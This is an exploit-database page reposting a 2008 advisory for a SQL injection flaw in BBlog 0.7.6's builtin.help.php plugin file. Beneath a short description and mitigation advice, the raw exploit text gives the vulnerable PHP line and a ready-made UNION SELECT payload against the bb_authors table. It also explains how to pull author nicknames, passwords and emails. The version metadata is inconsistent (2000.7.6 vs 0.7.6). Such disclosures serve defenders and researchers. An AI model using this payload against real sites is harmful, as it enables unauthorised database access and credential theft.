header-logo
Suggest Exploit
vendor:
BBlog
by:
IP-Sh0k
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: BBlog
Affected Version From: 2000.7.6
Affected Version To: 2000.7.6
Patch Exists: NO
Related CWE: N/A
CPE: a:bblog:bblog:0.7.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

BBlog 0.7.6 SQL Injection Vuln

BBlog 0.7.6 is vulnerable to SQL Injection. The vulnerability exists in the builtin.help.php file, where user input is not properly sanitized before being used in an SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable script. This can allow the attacker to gain access to sensitive information from the database, such as user credentials.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate SQL queries that can be exploited. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#######################################################
########## BBlog 0.7.6 SQL Injection Vuln #############
#######################################################
#
# Vulnpath: /bblog_plugins/builtin.help.php
# 
# Vuln: if($_GET['mod']) $pluginrow = $bBlog->get_row("select * from ".T_PLUGINS." where name='".$_GET['mod']."' and type='modifier'");
#
#
#
# PoC: ?pid=1&mod='+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+bb_authors--
#
# help: On the number you can see you have to set:
#       concat_ws(0x3a,id,nickname,password,email,icq) 
#
#
# Found by: IP-Sh0k
#######################################################

# milw0rm.com [2008-08-12]

Navigation

Suggest Exploit

Services By CQR